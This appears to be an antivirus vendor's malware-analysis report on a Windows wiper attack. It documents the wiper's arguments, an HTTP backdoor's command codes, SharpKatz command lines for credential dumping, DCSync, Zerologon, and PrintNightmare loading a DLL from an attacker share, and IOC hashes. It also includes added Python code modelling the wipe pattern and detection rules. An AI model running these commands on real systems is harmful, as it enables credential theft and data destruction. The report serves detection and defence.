1 Technical details
1.1 Modules and malware operation sequences
This malware consists of several modules, including executable programs and various scripts, each of which performs a small task.
The following is a list of the malware files with a brief description of what each one does.
File Name | Description |
wint.bat | Batch file launched by the scheduled task; it runs the msdskint.exe service |
msdskint.exe | Destroys the hard disk data (wipe), changes users’ passwords, deletes Windows backup files, etc. |
Sharpk.exe | A tool for retrieving users’ authentication information (credentials) |
uhsvc.exe | An HTTP service used to communicate with the C&C servers; the attacker also used this file to copy the Sharpk.exe tool |
Last file | Contains the path of the last corrupted file |
Table 1 – Summary of the malware modules and their roles
1.1.1 Description of the sharpk.exe file operation
Sharpkatz is a tool published on GitHub that implements the sekurlsa and lsadump modules of mimikatz. It is used to collect credential material from Windows hosts.
This tool consists of several modules designed for different attack functions. Some commonly used modules are:
MSV, Kerberos, TSPKG, Windows Credential Manager, WDigest
The main modules that this tool can run are as follows:
- Lsadump
This module extracts the password hash of a specific user.
- Pth
Pass-the-hash: using a specific user's hash, it acts with that user's access without needing the plaintext password. This module does not require Admin access to work; even a normal user can run it.
- LogonPasswords
Displays the credentials of recently logged-in users.
- Zerologon (for stealing Active Directory information)
Zerologon, CVE-2020-1472, is one such vulnerability and was first reported in September 2021. The vulnerability, caused by the way Microsoft implemented encryption in the Netlogon process, allows attackers to take over Windows servers, especially Active Directory servers.
- DCSync
The DCSync module in Sharpkatz allows an attacker to impersonate a domain controller and retrieve password hashes from other domain controllers without executing code on the target.
The following table lists the arguments accepted by the sharpk.exe file along with their functionality.
Input Argument | Description |
--Command ekeys | List the Kerberos encryption keys (Kerberos is a network authentication protocol) |
--Command msv | Retrieve user credentials from the MSV package, including interactive, batch and service logons |
--Command kerberos | Retrieve user credentials from the Kerberos package |
--Command tspkg | Retrieve user credentials from the TSPKG package |
--Command credman | Retrieve user credentials from the Credential Manager (credman) |
--Command wdigest | Retrieve user credentials from the WDigest package |
--Command logonpasswords | Retrieve the credentials of logged-on users |
--Command listshadows | List the system's shadow copies (backups) |
--Command dumpsam --System syspath --Sam sampath | Dump credentials from the SAM database (SYSTEM and SAM hive paths given as arguments) |
--Command pth --User username --Domain userdomain --NtlmHash ntlmhash | Create a process as the given domain user, authenticating with the NTLM hash of the user's password |
--Command pth --User username --Domain userdomain --Rc4 rc4key | Create a process as the given domain user, authenticating with the RC4 key |
--Command pth --Luid luid --NtlmHash ntlmhash | Replace the NTLM hash of an existing logon session |
--Command dcsync --User user --Domain userdomain --DomainController dc | Dump a user's credentials by username |
--Command dcsync --Guid guid --Domain userdomain --DomainController dc | Dump a user's credentials by GUID |
--Command dcsync --Domain userdomain --DomainController dc | Write the information extracted from AD to a file in the current user's temp folder |
--Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Dump a user's credentials by username, using alternative credentials |
--Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Dump a user's credentials by GUID, using alternative credentials |
--Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword | Write the information extracted from AD to a file in the current user's temp folder, using alternative credentials |
--Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ | Check whether the target is vulnerable to Zerologon |
--Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ | Exploit the Zerologon vulnerability |
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPtp0 | Exploit Zerologon and then dump a user's credentials by username |
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCPb22.l | Exploit Zerologon and then dump a user's credentials by GUID |
--Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab | Exploit Zerologon and then write the information extracted from AD, using alternative credentials, to a file in the current user's temp folder |
--Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll | Exploit the PrintNightmare vulnerability against the target |
--Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom | Exploit the PrintNightmare vulnerability using the supplied credentials |
Table 2 – Description of Sharpkatz tool commands
1.1.2 Description of the .NETWSM task operation
This scheduled task is responsible for executing the wint.bat file:
c:\programdata\pcmr\wint.bat
1.1.3 Description of the wint.bat file operation
This file runs the malicious Wiper as a service. The service uses the fake name “Windows Taks Scheduler”; as the service name shows, it uses the word “Taks” instead of “Tasks”. The Wiper file, msdskint.exe, was found on various systems in the following paths:
HGH-HGH-KHSRAVI system:
c:\windows\ccmcache\6\msdskint.exe
Other systems:
c:\programdata\pcmr\msdskint.exe
1.1.4 Description of the msdskint.exe file operation
This file is the Wiper created by the attacker. It accepts arguments from the input; if no input argument is given, the file falls back to a set of predefined arguments that it uses during execution.
The attacker packed this file with the “Eziriz .NET Reactor” tool to keep the malware code out of the sight of analysts and antivirus. The following describes the malware's operations after unpacking the program.
The following table lists the arguments accepted by the msdskint.exe file along with their functionality.
Input Argument | Description |
-wipe-exclude | Paths given after this argument are added to the malware's exception list and are not wiped. |
-light-wipe | The number of times the malware's destruction buffer is written to each victim file. |
-sessions | Logs off all active sessions and restarts them. |
-delete-users | With this argument, the accounts of logged-in users are deleted from the system. |
-shadows | All backups (shadow copies) of system data are erased. |
-start-iis | Starts the IIS service. |
-config | Operation not defined. |
-processes | The processes named after this argument are terminated. |
-Logs | The malware clears all Event Viewer logs using the Windows wevtutil.exe tool (log enumeration and clearing). |
-delete | If this argument is entered, the wiped files are finally deleted from the system (the Windows Win32Native.DeleteFile function is called). |
-break-users | Changes the passwords of the victim system's users. |
-wipe-only | Only files in the given paths are corrupted. |
-purge | Full purge: the file contents are destroyed with a different procedure than the normal one. |
-passwords | Operation not defined. |
-wipe-all | Destroys the data on all system drives. |
-stop-iis | Stops the IIS service. |
Table 3 – Description of Wiper malware commands
The following is a more detailed description of the arguments that need further explanation.
- Argument -break-users
If this argument is entered and users are specified, the malware sets a password for each of the accounts defined on the system. The password is the fixed string “S7Y1a82R!”.
Figure 2 – The malware changes the users’ password
- Argument -purge
This argument is used when wiping files. In general, the malware wipes data with a 200-byte buffer whose contents are generated randomly by an algorithm.
If the purge argument is entered, a value named full_purge is set in the malware code, which means a complete cleanup. In this case, the malware destroys the file's contents by writing the buffer to the file in 200-byte blocks until it reaches the end of the file.
The malware also carries a list named purgeExtensions in its code, containing the attacker's candidate extensions. If the file to be destroyed has one of these extensions, its data is destroyed with the same full_purge procedure.
Figure 3 – Candidate extensions
In addition to the list above, there are other strings in the malware file that can be considered candidate extensions. These extensions are:
.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
- Argument -wipe-all
If this argument is entered, all active system drives are collected into a list, and then all data on those drives is wiped.
When data is corrupted, 3 files are excluded:
- default.htm
- index.htm
- death_to_raisi.exe
When full_purge is not set and the file's extension is not among the candidate extensions, the malware destroys the data as follows. It first writes the 200-byte buffer at offset zero of the file. It then divides the total file size by 1024 and stores the result in the variable num4.
If a number was given for the light_wipe argument, it takes the minimum of light_wipe and num4 and stores it in num4.
It then skips 4 times 1024 bytes (0x400) from the current offset and writes the same buffer over the next 200 bytes, and so on until it reaches the end of the file. Finally, it creates the file lastfile2 in the folder of the corrupted file and writes the path of that file into it.
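To make the damage pattern just described concrete, here is an added Python model (not the malware's code and not from the original report) that, without touching any file, computes the byte ranges msdskint.exe would overwrite in a file of a given size under -light-wipe and -purge, so a responder can estimate what is still recoverable. Where the description is ambiguous the model assumes that the initial write at offset 0 counts toward the min(light_wipe, num4) budget, that this first write always happens, and that each later write starts 4 * 0x400 bytes after the end of the previous one; the extension list is a subset of the report's.

```python
"""Model of the msdskint.exe wipe pattern as the report describes it (added example,
not the malware's code). Pure offset arithmetic: nothing is written to any file.
Assumptions where the report is ambiguous:
  * the write at offset 0 counts toward the budget min(light_wipe, size // 1024);
  * that first write always happens, even for files smaller than 1024 bytes;
  * each further write starts 4 * 0x400 bytes after the end of the previous one.
"""
import os
from typing import List, Tuple

BUFFER = 200        # size of the random buffer the report describes
STRIDE = 4 * 0x400  # bytes skipped between two writes (4 * 1024)
# Subset of the candidate extensions listed in the report.
PURGE_EXTENSIONS = {".accdb", ".doc", ".docx", ".xls", ".xlsx", ".pdf",
                    ".jpg", ".zip", ".sqlite", ".bak", ".dbf", ".rar"}
Range = Tuple[int, int]  # half-open [start, end)

def needs_full_purge(filename: str, purge_flag: bool) -> bool:
    """full_purge applies when -purge was given or the extension is a candidate."""
    return purge_flag or os.path.splitext(filename)[1].lower() in PURGE_EXTENSIONS

def wiped_ranges(size: int, light_wipe: int = 0, full_purge: bool = False) -> List[Range]:
    """Byte ranges the wiper overwrites in a file of `size` bytes."""
    if size <= 0:
        return []
    if full_purge:                  # 200-byte blocks back to back until EOF
        return [(0, size)]
    budget = size // 1024           # num4 in the report
    if light_wipe > 0:
        budget = min(light_wipe, budget)
    budget = max(budget, 1)         # the offset-0 write always happens (assumption)
    ranges: List[Range] = []
    pos = 0
    while pos < size and len(ranges) < budget:
        end = min(pos + BUFFER, size)
        ranges.append((pos, end))
        pos = end + STRIDE          # skip 4 * 0x400 bytes, then write again
    return ranges

def intact_ranges(size: int, light_wipe: int = 0, full_purge: bool = False) -> List[Range]:
    """Complement of wiped_ranges: the bytes a recovery effort can still rely on."""
    gaps: List[Range] = []
    cursor = 0
    for start, end in wiped_ranges(size, light_wipe, full_purge):
        if start > cursor:
            gaps.append((cursor, start))
        cursor = end
    if cursor < size:
        gaps.append((cursor, size))
    return gaps

def damage_fraction(size: int, light_wipe: int = 0, full_purge: bool = False) -> float:
    """Share of the file that is overwritten, 0.0 .. 1.0."""
    if size <= 0:
        return 0.0
    return sum(e - s for s, e in wiped_ranges(size, light_wipe, full_purge)) / size
```

With the service default of -light-wipe 3, a 10 000-byte document loses only three 200-byte blocks (6% of the file), which is why light-wiped office files are often partly recoverable while full_purge files are not.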
As mentioned earlier, msdskint.exe also has predefined arguments that it uses when it receives no input argument. When run as a service, this file uses the following default arguments:
Figure 4 – List of strings as input arguments
Based on these arguments, the service behaves as follows:
- The value of -light-wipe is 3. This means the data destruction buffer is written to each file 3 times.
- The IIS service is stopped.
- All Event Viewer logs of the Windows operating system are deleted.
- All backups are deleted.
- The value of -processes is SQL*, meaning all processes whose names match SQL* are terminated.
- All data on active drives is wiped, except for the excluded paths.
- The paths excluded by the attacker are as follows:
"C:\Windows" "C:\$Recycle.Bin" "C:\$WinREAgent" "C:\Config.Msi" "C:\MSOCache" "C:\Recovery" "C:\Program Files\IBM\*" "C:\System Volume Information" "C:\Program Files\dotnet" "C:\Program Files (x86)\dotnet*" "C:\Program Files\Symantec*" "C:\Program Files (x86)\Symantec*" "C:\Program Files (x86)\Padvish*" "C:\Program Files\Kaspersky*" "C:\Program Files (x86)\Kaspersky*" "C:\Program Files\Microsoft*" "C:\Program Files (x86)\Microsoft*" "C:\Program Files\Windows*" "C:\Program Files (x86)\Windows*"
The program contains a function indicating that the attacker was wary of the antivirus. For example, as shown in Figure 5, the malware checks the list of processes running on the system; if the Padvish antivirus service or UI is among them, the malware tries to perform the wipe in a different way instead of running its default wipe routine.
This change of tactic on the malware's part appears to be an attempt to evade the Padvish behavioral detection system, which detects the wipe method and stops it immediately; in any case, the malware's second method is also detected and stopped by Padvish.
In the second method, the malware creates a temporary bat file (tmp.bat) for each targeted file and creates two scheduled tasks for these temporary files with SYSTEM privileges.
Figure 5 – Antivirus service and UI search by malware
Figure 6 – Change of the data destruction method by the malware after finding the Padvish antivirus service
The following is an example of a bat file created:
Figure 7 – An example of a bat file created to destroy information
As the contents of this bat file show, the malware first uses the Windows fsutil tool to create a file with null content and the same size as the file it wants to destroy (here 3072 bytes), with the qipe extension. It then intends to replace the original file with this fake file.
Knowing that Padvish Antivirus can prevent the destruction of system data, the attacker tried another way to delete data using standard system tools. However, the Padvish anti-ransomware component also blocked this type of attack.
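Detection logic for the fallback method just described, as an added example (not code from the report or from Padvish): it scans process-creation events for fsutil creating a zero-filled .qipe file and for a scheduled task that runs a tmp.bat as SYSTEM, then grades the combination. The event format, the schtasks command line and the naming of the .qipe file as "victim name plus .qipe" are constructed assumptions; only fsutil, the .qipe extension, tmp.bat and the SYSTEM privilege come from the report.

```python
"""Detect the wiper's fallback method: fsutil creating a zero-filled .qipe file plus a
SYSTEM scheduled task running tmp.bat (added example; the event format is constructed)."""
import re
from collections import Counter
from typing import List, Tuple

# Constructed process-creation events: "<image> | <command line>" (not real telemetry).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe | cmd.exe /c C:\Users\alice\Documents\tmp.bat",
    r"C:\Windows\System32\fsutil.exe | fsutil file createnew C:\Users\alice\Documents\report.docx.qipe 3072",
    r"C:\Windows\System32\schtasks.exe | schtasks /create /tn upd1 /tr C:\Users\alice\Documents\tmp.bat /sc once /st 10:05 /ru SYSTEM",
    r"C:\Windows\System32\fsutil.exe | fsutil usn queryjournal C:",
    r"C:\Windows\System32\schtasks.exe | schtasks /query /tn Backup",
    r"C:\Windows\System32\fsutil.exe | fsutil file createnew C:\Users\alice\Pictures\holiday.jpg.qipe 204800",
]

# (rule name, pattern on the image path, pattern on the command line)
RULES: List[Tuple[str, re.Pattern, re.Pattern]] = [
    ("qipe_staging",                      # empty .qipe file sized like the victim file
     re.compile(r"\\fsutil\.exe$", re.I),
     re.compile(r"\bfile\s+createnew\s+(\S+\.qipe)\s+\d+", re.I)),
    ("system_task_tmp_bat",               # the swap is scheduled to run as SYSTEM
     re.compile(r"\\schtasks\.exe$", re.I),
     re.compile(r"/create\b.*\btmp\.bat\b.*/ru\s+system\b", re.I)),
]

def parse_event(line: str) -> Tuple[str, str]:
    image, cmdline = line.split(" | ", 1)
    return image.strip(), cmdline.strip()

def scan(events: List[str]) -> List[Tuple[int, str]]:
    """(event index, rule name) for every event that matches a rule."""
    findings = []
    for idx, line in enumerate(events):
        image, cmdline = parse_event(line)
        for name, img_re, cmd_re in RULES:
            if img_re.search(image) and cmd_re.search(cmdline):
                findings.append((idx, name))
    return findings

def staged_targets(events: List[str]) -> List[str]:
    """Victim files implied by the .qipe files (assumed naming: victim name plus .qipe)."""
    targets = []
    for idx, name in scan(events):
        if name == "qipe_staging":
            match = RULES[0][2].search(parse_event(events[idx])[1])
            targets.append(match.group(1)[:-len(".qipe")])
    return targets

def severity(findings: List[Tuple[int, str]]) -> str:
    """One fsutil call can be benign; a SYSTEM tmp.bat task or a burst of .qipe files is not."""
    counts = Counter(name for _, name in findings)
    if counts["system_task_tmp_bat"] and counts["qipe_staging"]:
        return "critical"
    if counts["qipe_staging"] >= 2:
        return "high"
    if counts["qipe_staging"] or counts["system_task_tmp_bat"]:
        return "medium"
    return "none"
```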
There are commands in the program code indicating that this malware can record its execution time in a log, as follows:
In the malware code, strings titled “- Excluded”, “- Skipped”, “BreakSelectedUsers”, “DeleteSelectedUsers”, “KillProcesses” and others are visible. At the end of the operation, this log ends with the string “Finished on” followed by the time. However, the attacker did not need to save the log from the Wiper file, because the body of the Output function, which is responsible for printing the result of the operation, is not provided.
1.1.5 Description of the uhsvc.exe file operation
This file acts as an HTTP service for the attacker. Information about the attacker's commands is stored in two files, uhsvc.exe.start and uhsvc.exe.ini.
This service, registered on the system as Microsoft Update Health Host, has commands for downloading and uploading files, connecting to the SQL database and sending the results to a malicious server, and manipulating local files. Various versions of this HTTP service have been found, including 0.1.3vXH and 0.1.4vXH. These versions do not differ in overall functionality and accept the same commands.
Like the Wiper file, this file is packed with “Eziriz .NET Reactor”. After unpacking, the following was observed:
1. After running as a service, the malware creates a TcpListener on the victim system. The version shown below uses port 9399. In the uhsvc.exe.start file that was found, the attacker allowed incoming packets to port 9399 from outside the network through the victim system's firewall.
Figure 8 – Content of the uhsvc.exe.start file
2. The malware can receive various commands from the attacker's server and execute them, using the cmd tool.
Figure 9 – Execution of the attacker's commands through the shell
3. It uses the SqlConnection and SqlCommand classes to execute queries on the SQL database.
4. It can create a file.
Figure 10 – File creation by the attacker through the malware
5. The malware can zip and unzip directory contents, download/upload files and, if necessary, delete the attacker's files. It uses the Ionic.Zip library to compress files.
Figure 11 – Ability to compress/extract and delete files
Figure 12 – Ability to manipulate directory contents
6. It can obtain the address of a proxy server to communicate through, via the commands “p=” and “b=”.
Figure 14 – Proxy setting
7. It can display the malware version to the attacker (the attacker used several versions of the HTTP service in the operation).
Figure 15 – Display of the malware version
8. It can display the current path of the malware file (the malware path was “c:\programdata\pcmr\uhsvc.exe”).
9. It can create a log file and send it so the attacker can see possible errors.
Figure 16 – Creating a log file
The following table shows the list of operations supported by the malware:
Operation | Command code |
ShellExecute with zip support | a_1=s |
Run SQL commands | a_1=c |
View the output and error logs, then delete them | a_1=i1 |
Delete the output and error logs | a_1=i2 |
Run cmd interactively | a_1=i |
ShellExecute | Cmd= |
Show the malware path | W_i |
Show the malware version | V_i |
Act as a proxy and forward the connection to another website / infected node | p= or b= |
Write any file | M=afe=1 |
Run SQL commands | Con |
File manager (browse directories, download / upload files, ...) | PRT |
Read / write based on GET | other |
Table 4 – Malware web service commands
2 How to deal with the malware
All known samples of this malware are detected by Padvish as HackTool.Win32.HTTPbackdoor, HackTool.Win32.SharpKatz and Trojan.Win32.QWipe.
In addition, Padvish's unique data-protection feature detects this malware's wipe function, prevents it from destroying data and terminates its execution.
3 Symptoms of Infection (IOC)
File Name | MD5 |
uhsvc.exe | 466832ef3f81f1cc37466be9e1b7c4d2 9fbab064ec583f80dc15e1abc2ebcad3 2529ed634df912d95d52be717560b0b6 cc97e34cf19f56263abd0f89e907cf7a 66e6d3b03613074f38b2a6acff8e8229 94354ecf588835cea2352b873211290e af029e3168e27394020b3f4315b2419b 2c1e86a5c5c5ad19d64baa66e78af6f1 e633f5ce289cdcbdee93b7c02178fa35 4cc3665c4fb23ace6b0f9b396c66f8e6 |
uhsvc.exe.start | 381d8239561c3714c1b71f0c2df4f57e |
msdskint.exe | 13e7caebf00dd2315885e1f47030eb3c |
wint.bat | 0aa3b91d584803a39250742b69173841 |
Sharpk.exe | 3ea25f166bef1bf79c374f16f2e4e29f |